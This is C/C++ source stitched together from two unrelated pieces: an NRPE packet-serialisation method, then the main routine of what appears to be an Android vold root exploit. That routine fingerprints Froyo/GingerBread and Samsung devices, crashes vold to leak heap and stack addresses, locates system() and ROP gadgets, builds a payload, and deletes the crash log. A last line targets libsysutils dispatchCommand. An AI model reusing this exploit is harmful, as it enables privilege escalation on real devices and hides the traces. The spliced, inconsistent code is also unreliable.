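/// Serialise this packet into a freshly allocated, NUL-terminated buffer owned
/// by the object (tmpBuffer) and return it.
///
/// The payload-size check runs before the old buffer is released and before
/// anything is allocated, so a rejected payload (or a throwing
/// get_packet_length) leaves the previously built buffer intact instead of a
/// dangling or half-written tmpBuffer as in the earlier order of operations.
///
/// @return Pointer to the internal buffer; valid until the next call or until
///         the owning object is destroyed.
/// @throws nrpe::nrpe_exception if the payload does not fit in payload_length_
///         (one byte is reserved for the terminating NUL).
const char* create_buffer() {
    // Reject before touching tmpBuffer: on failure the caller still holds the
    // buffer from the previous call.
    if (payload_.length() >= payload_length_)
        throw nrpe::nrpe_exception("To much data cant create return packet (truncate data)");

    const unsigned int packet_length = nrpe::length::get_packet_length(payload_length_);

    delete[] tmpBuffer;
    tmpBuffer = new char[packet_length + 1];
    // Zero-fill: every byte up to packet_length is covered by the CRC below,
    // and the extra byte is the NUL terminator.
    memset(tmpBuffer, 0, packet_length + 1);

    // The wire struct is overlaid on the raw buffer; header fields are written
    // in network byte order.
    nrpe::data::packet *p = reinterpret_cast<nrpe::data::packet*>(tmpBuffer);
    p->result_code    = swap_bytes::hton<int16_t>(result_);
    p->packet_type    = swap_bytes::hton<int16_t>(type_);
    p->packet_version = swap_bytes::hton<int16_t>(version_);
    update_payload(p, payload_);

    // The CRC is computed over the whole packet with the crc field itself
    // zeroed; the NUL byte at packet_length is outside the checksummed range.
    p->crc32_value = 0;
    crc32_ = p->crc32_value = swap_bytes::hton<u_int32_t>(calculate_crc32(tmpBuffer, packet_length));
    return tmpBuffer;
}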
/**
 * Entry point. Runs the steps announced by the status messages below, each
 * gated by globals that helpers declared elsewhere in this file fill in
 * (find_symbol, check_addr, checkcrash, heap_oracle, find_stack_addr,
 * bad_byte, check_libc_base, find_rop_gadgets, update_payload,
 * print_payload). argc/argv/env are unused; i and ok are never read.
 * Every failure path prints a "[-]" line and calls exit(-1), which the
 * shell sees as status 255.
 */
int main(int argc, char **argv, char **env) {
    uint32_t i = 0, ok = 0;          // never used
    struct stat st;
    char version_release[1024];      // reused for two different properties below
    int tries=0;
    int payload_size=0;

    // stat() return value is unchecked: if `vold` cannot be stat'ed, st.st_size
    // is uninitialised and heap_base_addr is derived from garbage.
    stat(vold, &st);
    // 0x1000-rounded value just above st_size + 0x8000.
    heap_base_addr = ((((st.st_size) + 0x8000) / 0x1000) + 1) * 0x1000;

    // The release string selects a per-version constant. strstr is a substring
    // match, so any release containing "2.2" or "2.3" is accepted. The buffer is
    // well above the property value limit (PROP_VALUE_MAX), so no overflow here.
    __system_property_get("ro.build.version.release", version_release);
    if (strstr(version_release, "2.2")) {
        heap_offset = 0x108;
        printf("[+] Found a Froyo ! 0x%08x\n", heap_offset);
    } else if (strstr(version_release, "2.3")) {
        heap_offset = 0x118;
        printf("[+] Found a GingerBread ! 0x%08x\n", heap_offset);
    } else {
        printf("[-] Not a 2.2/2.3 Android ...\n");
        exit(-1);
    }
    heap_addr = 0xffffff;  // initial value; presumably refined by heap_oracle() below — confirm there

    // Same buffer, second property: only the first 7 bytes of the fingerprint are compared.
    __system_property_get("ro.build.fingerprint", version_release);
    if(!strncmp(version_release, "samsung", 7)) {
        printf("[+] Found a Samsung, running Samsung mode\n");
        samsung = 1;
    }

    // libc_base assumes libc is mapped on a 1 MiB boundary; check_libc_base()
    // below may revise it (the low 20 bits of system_ptr are reapplied there).
    system_ptr = (uint32_t) find_symbol("system");
    libc_base = system_ptr & 0xfff00000;
    if (check_addr(system_ptr) == -1) {
        printf("[-] system_ptr contains forbidden bytes!\n");
        exit(-1);
    }

    tries = 0;
    printf("[*] Step 1: causing the first vold crash...\n");
    // Assignment in the condition: walks allbuffsz until a 0 entry. allbuffsz
    // must be 0-terminated or this reads past its end — confirm at its definition.
    while(buffsz=allbuffsz[tries]) {
        if(checkcrash()) {
            printf("[+] Vold crashed using %d arguments!\n", buffsz);
            break;
        }
        tries++;
    }
    if(!buffsz) {
        printf("[-] Unable to crash vold process. 
Fixed vold???\n");
        exit(-1);
    }

    // Up to two attempts; 0x41414141 is treated as the "not found" value for
    // stack_addr (presumably what find_stack_addr() leaves on failure).
    for (tries = 0; tries < 2; tries++) {
        heap_oracle();
        printf("\n[*] Step 2: causing the second vold crash\n");
        find_stack_addr();
        if (stack_addr != 0x41414141 && jumpsz) {
            printf("[+] stack_addr found: 0x%08x, padding: 0x%04x\n", stack_addr, jumpsz);
            break;
        }
    }
    if (stack_addr == 0x41414141 || !jumpsz) {
        printf("[-] Unable to generate stack_addr!\n\n");
        exit(-1);
    }

    // If only the low byte is rejected by check_addr(), step the address by 4
    // and remember the shift in `adjust`; any other rejection is fatal.
    if (check_addr(stack_addr) == -1) {
        if(bad_byte(stack_addr & 0xff)) {
            stack_addr += 4;
            adjust = 4;
            if (check_addr(stack_addr) == -1) {
                printf("[-] stack_addr contains forbidden bytes!\n");
                exit(-1);
            }
        } else {
            printf("[-] stack_addr contains forbidden bytes!\n");
            exit(-1);
        }
    }
    // Upper bound on padding; 108 + 12 presumably reflects a fixed buffer layout — confirm.
    if (jumpsz > 108 + 12) {
        printf("[-] Too much padding is needed!\n");
        exit(-1);
    }

    // Recompute system_ptr against the (possibly corrected) libc_base and
    // re-run the byte check on the result.
    if(check_libc_base()) {
        system_ptr = libc_base + (system_ptr & 0x000fffff);
        printf("[*] Pointer to system function found at 0x%08x ...\n", system_ptr);
        if (check_addr(system_ptr) == -1) {
            printf("[-] Pointer to system function contains forbidden bytes!\n");
            exit(-1);
        }
    }

    // Stop the logcat child and delete the captured crash log; neither return
    // value is checked. logcat_pid and crashlog are set elsewhere.
    kill(logcat_pid, SIGKILL);
    unlink(crashlog);

    printf("\n[*] Researching ROP gadgets ...\n");
    find_rop_gadgets();
    printf("[+] first gadget found at 0x%08x, second gadget found at 0x%08x\n", stack_pivot, pop_r0);

    // Build and print the payload; main only reports it, do_fault() is what sends it.
    payload_size = update_payload();
    printf("\n[*] Payload generated: %d bytes\n", payload_size);
    print_payload(payload_size);
    return 0;
}
// Exploit libsysutils FrameworkListener::dispatchCommand method int do_fault() { return send_payload(update_payload()); }